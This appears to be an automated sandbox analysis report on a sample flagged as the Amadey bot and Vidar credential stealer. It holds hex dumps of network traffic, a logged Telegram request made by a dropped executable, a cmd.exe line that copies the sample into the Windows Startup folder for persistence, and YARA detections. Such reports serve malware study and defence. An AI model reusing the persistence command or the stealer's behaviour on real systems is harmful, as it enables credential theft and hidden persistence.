54 79 f7
                                                                              Data Ascii: }'LROS+u|K(w&}[An$=SHz Z<CJ+#,-Y"Sj84`#SX\C$bljA%pvToyM^tMCCeXgIh~;5FX(pIe[$JDxjr<[xp=iooOpu(o,V92-D"+J`1Ty
                                                                              2022-06-01 23:53:56 UTC1794INData Raw: 5e a4 3b 01 68 57 f4 9f 11 35 e3 48 15 6b c2 81 29 26 17 80 da 68 25 bb f0 c2 11 81 61 5b 7e 3c 31 e3 a7 46 8e c2 72 39 d0 07 5a 42 5f 40 93 f9 01 3b 3b fb b3 85 e7 50 59 56 45 58 88 71 6e 83 ae 2f b6 6a 75 20 be 76 71 4c 5c 4d 98 0f 70 72 95 2f a9 b4 4f 67 00 49 3c 92 e6 af 92 84 70 9b 2e 19 41 7e 06 ff d9 a7 e0 ed 81 c6 0b 2c d8 c6 d7 cc e5 e8 a1 2a 0b da 30 80 7b f1 0b c1 a2 34 06 92 bd a1 bb 30 e8 8b 9d c7 10 dd 2c ae 1c 6c 15 86 8b b8 df 2e 9a 5f 6b a6 2f 21 e7 ba 8c 01 c7 12 cf 44 f1 df da b1 62 72 e7 80 e2 0d 1e 40 5a 6b da 33 b1 aa 13 4b 51 6f a0 86 13 24 ba 62 d0 b1 75 29 a2 e9 5d f6 50 a2 75 a7 b1 8c 2d d1 34 01 dd 96 0f dd 7f e2 5b bc 66 54 a2 33 14 78 fa 37 ad ba 6b b4 a8 41 6b 9f aa 8d a4 ff 0f f7 e7 6e e3 86 f3 41 0e 39 17 de 54 1f 1e b9 ab
                                                                              Data Ascii: ^;hW5Hk)&h%a[~<1Fr9ZB_@;;PYVEXqn/ju vqL\Mpr/OgI<p.A~,*0{40,l._k/!Dbr@Zk3KQo$bu)]Pu-4[fT3x7kAknA9T
                                                                              2022-06-01 23:53:56 UTC1797INData Raw: c4 dc bf 43 49 6f ca 98 f9 4d c5 03 cc 21 4b c5 b0 6b b2 8d 57 15 51 27 39 97 b8 ca f9 07 fd 92 23 b0 78 81 ac 03 14 f8 54 79 5e 7f 40 62 6e b5 eb fa 6f 62 d7 3a d5 13 f0 25 01 ca 4c 21 17 dc d1 9b 6d 2e eb e5 c2 b8 2e c4 0d 4f d1 2a 31 49 a9 a2 4c 80 1d d2 a6 f4 80 cc dd 43 8c 20 2d a8 47 c0 df b5 53 43 2c 79 e2 c4 84 55 ad a1 03 b4 4a 8b 0d ea dc 9b 27 f6 ba 09 45 b3 ea 9f b6 1a ff 21 38 02 2e dd b7 fb 03 6d 7f fa b1 db 6a e8 4e 05 fa 79 9d 4a 42 6c 9f df e4 f1 48 b7 4c 0b a5 ed 12 5c 9f a7 ee 2f 38 49 46 a6 c4 aa ee 98 42 ea c1 f1 51 ba 95 f4 ac 40 f5 e4 7e 82 1b 0c 28 e7 6d 77 7d cc c8 84 a4 42 fc f0 84 c2 be c9 b5 7f 84 44 07 60 b9 ae b1 a5 f0 27 2f de 42 c6 bb 2f 0f e2 32 ec 76 9d 39 24 0b 14 bd eb 09 23 51 2b 20 5e 1b 32 88 4d 0d 1f af 2c 1d 24 ba
                                                                              Data Ascii: CIoM!KkWQ'9#xTy^@bnob:%L!m..O*1ILC -GSC,yUJ'E!8.mjNyJBlHL\/8IFBQ@~(mw}BD`'/B/2v9$#Q+ ^2M,$
                                                                              2022-06-01 23:53:56 UTC1801INData Raw: 41 7d 00 36 5a 3c 10 2b 49 60 ca 3f c5 0b 32 5d 5b b2 35 38 af 77 03 ff c7 ce d6 67 c5 21 cb e4 ad 54 b4 ee 3a 04 5d 2e 0a 43 b3 85 97 b8 44 ad 9a 9e 28 6b 24 ac e1 97 88 98 c2 a4 8d 7a e8 aa b8 8d 38 3f ba ff 10 4a a5 d7 e7 5a a8 2a e0 89 76 2d 43 1d 49 09 00 a2 18 4d 89 e6 56 b2 4c 63 e4 a1 3f 44 12 39 85 29 a6 55 98 70 d1 ec 34 2c df dd 2b a9 f2 cd 36 6e f3 7c 2f 30 38 0b 2c 36 55 54 3a 58 6b 62 95 d0 de ea c2 73 0d 69 89 6e da f6 af 0f e4 04 ba ef 3e 43 c5 ab 6d 0a a7 34 be 48 8f 7f c5 dd fc 04 19 56 c7 20 6b 0c d9 8a 78 6d f1 f1 6b cf 6f e6 43 b2 7e 75 c7 60 9f 09 6c e5 b7 05 8d 94 96 fe 19 80 cb 77 75 d7 aa 96 d7 6e c9 f9 9c 00 24 79 68 ce 93 1e 49 cd cb 08 a1 59 a8 9e 97 e0 e8 57 69 79 ed 25 ed 3c 16 6e cd b5 56 51 15 c6 dd 9a d6 52 b5 c5 1c a4 6d
                                                                              Data Ascii: A}6Z<+I`?2][58wg!T:].CD(k$z8?JZ*v-CIMVLc?D9)Up4,+6n|/08,6UT:Xkbsin>Cm4HV kxmkoC~u`lwun$yhIYWiy%<nVQRm
                                                                              2022-06-01 23:53:56 UTC1805INData Raw: db 87 4c d8 a5 2f 92 e3 1b 9f d0 2d 9d c8 a3 ef f3 65 83 f8 39 4c c8 10 11 ec a3 35 5d 9a 8f 58 4b e6 b8 f7 85 74 c3 de 31 08 a6 98 47 78 c6 a7 4b 1c 0c db a7 0b a6 b6 b6 57 69 cf a7 11 f9 5e bf bd 2c 3e d3 e7 e3 9a 89 a4 12 d8 b2 50 d8 e0 58 16 87 ce 00 49 2d bd c6 3a fa 4c dd e4 08 70 1c fc 37 6b 0f f0 d9 5b 77 8f 14 78 dd e1 bd 76 29 d0 e8 5c 4b 63 a4 51 37 3d 44 a2 59 95 87 2e ea a9 71 8b 65 3a c9 5f 9a 94 1a 0e 37 fa 83 30 1b 89 1e 0f 87 db bb c3 e4 8c 4f 21 aa 69 5c 63 ad ee a4 09 3a 50 91 15 3f d2 79 db 17 97 56 53 76 60 2d 18 d6 31 6a 92 d8 5e 6a d6 fc 49 4d 15 7a 35 dc 1f 0d ac e1 c2 2c 30 89 8f 72 9e 7b d3 ea a4 93 4b f3 98 42 02 02 1d 88 a6 c5 9e 6f e9 bf 39 9a e8 ab c2 47 d0 3b 5f 31 1e 86 ab d9 1b b8 4b c6 6e ec cc 9e 12 2f df aa 3f f9 29 2a
                                                                              Data Ascii: L/-e9L5]XKt1GxKWi^,>PXI-:Lp7k[wxv)\KcQ7=DY.qe:_70O!i\c:P?yVSv`-1j^jIMz5,0r{KBo9G;_1Kn/?)*
                                                                              2022-06-01 23:53:56 UTC1809INData Raw: 45 eb e4 aa d5 a6 61 0b 7a 51 f2 53 a9 49 6a 56 27 d1 93 9a cb 25 dd b3 87 2c 78 b7 86 40 0e 8f 73 69 5b c8 0c c8 de ab e4 90 38 0f e0 5c cf 9d ec 7e b0 f2 37 82 94 cb 93 31 05 3f 9b 2a 1a 5b 6c 66 5d 59 4a 32 47 ab b7 b1 92 be 99 09 d3 0f d2 3f be 40 2f 0a ab dc cc 8a 75 9a 35 b3 74 42 40 72 d6 f1 5a 97 35 4d 8b f2 5d 80 5d ca 3a a2 e8 20 de 73 5d bc 29 bb f1 e9 87 2b c9 bb 20 53 9f bd ed 84 14 dc c8 3f 58 d1 67 39 cf 8f 2f 6e c9 73 c5 f5 fa df 59 4c 68 5f 6e f8 be 15 b2 8f d1 f1 ad c7 9f b7 8d 97 ff 49 42 f0 64 a9 40 a3 47 22 09 cb ee 79 8e 74 63 42 a8 b7 44 fd 69 7d 4d 85 b3 a2 4b 7c 8a cf ed ca 01 59 7a a4 47 f3 27 42 ee 36 74 bc 59 30 87 55 e5 04 ed 23 a1 bd 49 d3 c3 16 8b e6 dc a2 10 fb e1 1b c3 71 c9 73 88 31 e7 02 9c 11 b5 21 fe 88 5f 94 ad 35 18
                                                                              Data Ascii: EazQSIjV'%,x@si[8\~71?*[lf]YJ2G?@/u5tB@rZ5M]]: s])+ S?Xg9/nsYLh_nIBd@G"ytcBDi}MK|YzG'B6tY0U#Iqs1!_5
                                                                              2022-06-01 23:53:56 UTC1813INData Raw: 0c f7 4a cb 5c 20 39 64 a5 93 e7 ac 36 b4 02 dd 16 3a 21 98 e5 a6 8d fa 29 b4 41 3d f9 c5 68 84 ce 64 be 82 93 72 0a 38 12 3a ec 68 bc 6b 43 cd 28 be 58 24 cf 6d aa ac 44 28 20 52 f4 3e af f4 b2 a8 85 28 63 b6 7e 65 65 63 4a 2c c3 f2 b4 c0 80 72 7d e6 3e d7 24 cf f1 14 16 36 38 ec 4e 9b e6 55 2c 7f 15 d4 09 a7 eb 67 30 58 4b 02 20 de 8c be bf 28 97 e5 48 fa 1b 9f 44 a0 aa 1e 80 06 95 1d ac 95 25 1e ac 5e 47 4e 47 87 5d 2a 5c df 2e bb 1e 04 e4 65 cb ef e9 f7 aa 64 b8 98 c4 ac 46 a3 92 36 8d e4 70 86 09 74 ce 3c e0 59 93 20 49 17 a6 9a fc ba 0e 79 19 75 49 bd fd 06 46 40 78 5b fe 0f 8b 95 6e 06 05 ac 0a 55 54 a0 28 18 25 8d b5 6d 44 0b 08 73 0d b8 32 c6 00 03 9c 77 ab 63 b9 4b 6b 42 9f 1b 53 ec 8a d4 8a 61 21 70 3b c8 a7 28 57 b1 9f 2d cd 19 a5 ab 2f f9 83
                                                                              Data Ascii: J\ 9d6:!)A=hdr8:hkC(X$mD( R>(c~eecJ,r}>$68NU,g0XK (HD%^GNG]*\.edF6pt<Y IyuIF@x[nUT(%mDs2wcKkBSa!p;(W-/
                                                                              2022-06-01 23:53:56 UTC1817INData Raw: 8c cf 11 73 37 2b 38 ca 20 05 35 22 63 f7 ba 39 06 a9 1e 1d d2 e0 47 2f 88 c6 05 ff 99 06 69 62 7b 6b ae e3 d9 87 75 f9 a3 5d 78 aa 19 d0 2c 29 71 40 76 4e ec 13 65 90 e3 3b 6b 97 5a e3 63 e1 58 ff 4d 3a 4f 75 d6 82 50 2d a1 6e b6 21 3e 87 d6 da b2 1d 70 cc 9e e0 00 a9 55 13 a9 91 61 a7 98 0e 1d ea c0 dc 7f f3 37 9d 45 21 2d 84 18 55 c0 97 36 ff 69 9c d8 29 2c e7 7a 4f e8 02 36 0f f9 df 16 c2 b4 27 57 03 9f 4d 13 d7 d0 8f 07 33 19 97 96 5c 24 45 02 c6 b2 bc 52 ae eb 7d 91 98 4b c7 54 02 bc 54 2c 10 f3 e8 84 40 99 cc d5 d1 4b 98 51 bc 8a 95 27 38 1a 55 ac 67 af d5 89 55 16 65 31 8d 08 11 eb 1a d5 32 08 85 f5 30 f6 11 16 71 96 23 ea 54 f8 a8 b3 04 2a 17 64 8a 8f 7c a7 ff cc 95 39 23 bd fc 16 d0 98 3b b8 0c e1 6a 15 86 2b 8f e6 04 62 a1 30 c7 ba be ea 56 36
                                                                              Data Ascii: s7+8 5"c9G/ib{ku]x,)q@vNe;kZcXM:OuP-n!>pUa7E!-U6i),zO6'WM3\$ER}KTT,@KQ'8UgUe120q#T*d|9#;j+b0V6
                                                                              2022-06-01 23:53:56 UTC1821INData Raw: f8 61 f8 64 f8 5d f8 41 f8 66 f8 5e f8 67 f8 f8 f8 f8 f8 1c f8 fc f8 f8 f8 4c f8 6a f8 59 f8 66 f8 6b f8 64 f8 59 f8 6c f8 61 f8 67 f8 66 f8 f8 f8 f8 f8 f8 f8 a8 fc 90 f9 f8 f8 f9 f8 4b f8 6c f8 6a f8 61 f8 66 f8 5f f8 3e f8 61 f8 64 f8 5d f8 41 f8 66 f8 5e f8 67 f8 f8 f8 6c f9 f8 f8 f9 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2c f8 5a f8 28 f8 f8 f8 26 f8 fb f8 f9 f8 3e f8 61 f8 64 f8 5d f8 3c f8 5d f8 6b f8 5b f8 6a f8 61 f8 68 f8 6c f8 61 f8 67 f8 66 f8 f8 f8 f8 f8 45 f8 65 f8 f8 f8 f8 f8 28 f8 00 f8 f9 f8 3e f8 61 f8 64 f8 5d f8 4e f8 5d f8 6a f8 6b f8 61 f8 67 f8 66 f8 f8 f8 f8 f8 28 f8 26 f8 28 f8 26 f8 28 f8 26 f8 28 f8 f8 f8 26 f8 ff f8 f9 f8 41 f8 66 f8 6c f8 5d f8 6a f8 66 f8 59 f8 64 f8 46 f8 59 f8 65 f8 5d f8 f8 f8 45 f8 65 f8 26 f8 5c f8 64 f8 64 f8
                                                                              Data Ascii: ad]Af^gLjYfkdYlagfKljaf_>ad]Af^gl(((((,Z(&>ad]<]k[jahlagfEe(>ad]N]jkagf(&(&(&(&Afl]jfYdFYe]Ee&\dd


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              4192.168.2.449893149.154.167.99443C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              2022-06-01 23:55:03 UTC1823OUTGET /hyipsdigest HTTP/1.1
                                                                              Host: t.me
                                                                              2022-06-01 23:55:03 UTC1823INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0
                                                                              Date: Wed, 01 Jun 2022 23:55:03 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 9550
                                                                              Connection: close
                                                                              Set-Cookie: stel_ssid=d3788638d5a725bfd9_16547912055225973096; expires=Thu, 02 Jun 2022 23:55:03 GMT; path=/; samesite=None; secure; HttpOnly
                                                                              Pragma: no-cache
                                                                              Cache-control: no-store
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Strict-Transport-Security: max-age=35768000
                                                                              2022-06-01 23:55:03 UTC1823INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 68 79 69 70 73 64 69 67 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 79 69 70 73 64 69 67 65 73 74 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f
                                                                              Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @hyipsdigest</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="hyipsdigest"><meta property="o


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:01:53:10
                                                                              Start date:02/06/2022
                                                                              Path:C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\0XzeMRyE1e.exe"
                                                                              Imagebase:0x430000
                                                                              File size:26112 bytes
                                                                              MD5 hash:4A2AC1E629644BE2B37F29F21998C8D3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.304714151.00000000038E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.304438812.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Target ID:7
                                                                              Start time:01:53:35
                                                                              Start date:02/06/2022
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\System32\cmd.exe" /c Copy "C:\Users\user\Desktop\0XzeMRyE1e.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                                                                              Imagebase:0x1190000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:9
                                                                              Start time:01:53:35
                                                                              Start date:02/06/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff647620000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:13
                                                                              Start time:01:53:37
                                                                              Start date:02/06/2022
                                                                              Path:C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Imagebase:0x730000
                                                                              File size:26112 bytes
                                                                              MD5 hash:4A2AC1E629644BE2B37F29F21998C8D3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000000.298445162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000000.297328127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000D.00000002.509327209.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000000.297012501.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000000.297993212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000000.297659773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000000.298902181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000D.00000002.509308584.0000000000D40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Target ID:16
                                                                              Start time:01:53:48
                                                                              Start date:02/06/2022
                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe"
                                                                              Imagebase:0x440000
                                                                              File size:26112 bytes
                                                                              MD5 hash:4A2AC1E629644BE2B37F29F21998C8D3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000002.446415275.0000000003832000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000002.446348077.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 14%, Metadefender, Browse
                                                                              • Detection: 65%, ReversingLabs
                                                                              Reputation:low

                                                                              Target ID:17
                                                                              Start time:01:53:54
                                                                              Start date:02/06/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe"
                                                                              Imagebase:0xc60000
                                                                              File size:1472680 bytes
                                                                              MD5 hash:FE87E3591C90ECCD54C558FB487E262E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: MALWARE_Win_Vidar, Description: Detects Vidar / ArkeiStealer, Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.511834005.0000000001477000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000011.00000002.511834005.0000000001477000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 20%, Metadefender, Browse
                                                                              • Detection: 65%, ReversingLabs
                                                                              Reputation:low

                                                                              Target ID:18
                                                                              Start time:01:54:08
                                                                              Start date:02/06/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe"
                                                                              Imagebase:0xc60000
                                                                              File size:1472680 bytes
                                                                              MD5 hash:FE87E3591C90ECCD54C558FB487E262E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Target ID:20
                                                                              Start time:01:54:17
                                                                              Start date:02/06/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe"
                                                                              Imagebase:0xc60000
                                                                              File size:1472680 bytes
                                                                              MD5 hash:FE87E3591C90ECCD54C558FB487E262E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low

                                                                              Target ID:21
                                                                              Start time:01:54:28
                                                                              Start date:02/06/2022
                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                                                                              Imagebase:0xd80000
                                                                              File size:26112 bytes
                                                                              MD5 hash:4A2AC1E629644BE2B37F29F21998C8D3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000000.410768530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000000.428197655.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000000.428611473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000000.427877581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000000.426514093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.430278226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000000.418537482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:11.6%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:194
                                                                                Total number of Limit Nodes:10
                                                                                execution_graph 25611 c9b8d8 DuplicateHandle 25612 c9b96e 25611->25612 25803 c9fcf8 25804 c9fcfa CreateWindowExW 25803->25804 25806 c9fe1c 25804->25806 25807 4ceec08 25808 4ceec52 25807->25808 25809 c991a1 3 API calls 25807->25809 25810 c991b0 3 API calls 25807->25810 25811 4cefa00 3 API calls 25807->25811 25812 4cefa10 3 API calls 25807->25812 25809->25808 25810->25808 25811->25808 25812->25808 25609 c9ff40 SetWindowLongW 25610 c9ffac 25609->25610 25613 c940d0 25614 c940e2 25613->25614 25619 c941e8 25614->25619 25617 c94118 25620 c9420d 25619->25620 25628 c942d8 25620->25628 25632 c942e8 25620->25632 25621 c940f9 25624 c93880 25621->25624 25625 c9388b 25624->25625 25640 c957fc 25625->25640 25627 c96a20 25627->25617 25629 c942dc 25628->25629 25631 c943ec 25629->25631 25636 c93e08 25629->25636 25633 c942ea 25632->25633 25634 c93e08 CreateActCtxA 25633->25634 25635 c943ec 25633->25635 25634->25635 25637 c95378 CreateActCtxA 25636->25637 25639 c9543b 25637->25639 25639->25639 25641 c95807 25640->25641 25644 c9581c 25641->25644 25643 c96ac5 25643->25627 25645 c95827 25644->25645 25648 c9584c 25645->25648 25647 c96ba2 25647->25643 25649 c95857 25648->25649 25652 c9587c 25649->25652 25651 c96ca2 25651->25647 25653 c95887 25652->25653 25654 c973be 25653->25654 25665 4cec7cf 25653->25665 25669 4cece41 25653->25669 25673 c991b0 25653->25673 25677 4cefa10 25653->25677 25681 4cefa00 25653->25681 25687 4cece50 25653->25687 25691 4cec7d0 25653->25691 25695 c991a1 25653->25695 25655 c973fc 25654->25655 25700 c9b2d0 25654->25700 25655->25651 25705 4cec8d8 25665->25705 25709 4cec8c9 25665->25709 25666 4cec7df 25666->25654 25671 c996a0 2 API calls 25669->25671 25672 c996b0 2 API calls 25669->25672 25670 4cece5e 25670->25654 25671->25670 25672->25670 25674 c991bf 25673->25674 25675 c996a0 2 API calls 25673->25675 25676 c996b0 2 API calls 25673->25676 25674->25654 25675->25674 25676->25674 25678 4cefa1e 25677->25678 25679 c991a1 3 API calls 25677->25679 25680 c991b0 3 API calls 25677->25680 25678->25654 25679->25678 25680->25678 25682 4cefa0f 25681->25682 25683 4cef9d9 25681->25683 25685 c991a1 3 API calls 25682->25685 25686 c991b0 3 API calls 25682->25686 25683->25654 25684 4cefa1e 25684->25654 25685->25684 25686->25684 25688 4cece5e 25687->25688 25689 c996a0 2 API calls 25687->25689 25690 c996b0 2 API calls 25687->25690 25688->25654 25689->25688 25690->25688 25692 4cec7df 25691->25692 25693 4cec8d8 3 API calls 25691->25693 25694 4cec8c9 3 API calls 25691->25694 25692->25654 25693->25692 25694->25692 25696 c991a4 25695->25696 25698 c996a0 2 API calls 25696->25698 25699 c996b0 2 API calls 25696->25699 25697 c991bf 25697->25654 25698->25697 25699->25697 25701 c9b2dc 25700->25701 25702 c9b325 25701->25702 25741 c9b598 25701->25741 25745 c9b58b 25701->25745 25702->25655 25706 4cec8ea 25705->25706 25713 c996a0 25705->25713 25721 c996b0 25705->25721 25706->25666 25711 c996a0 2 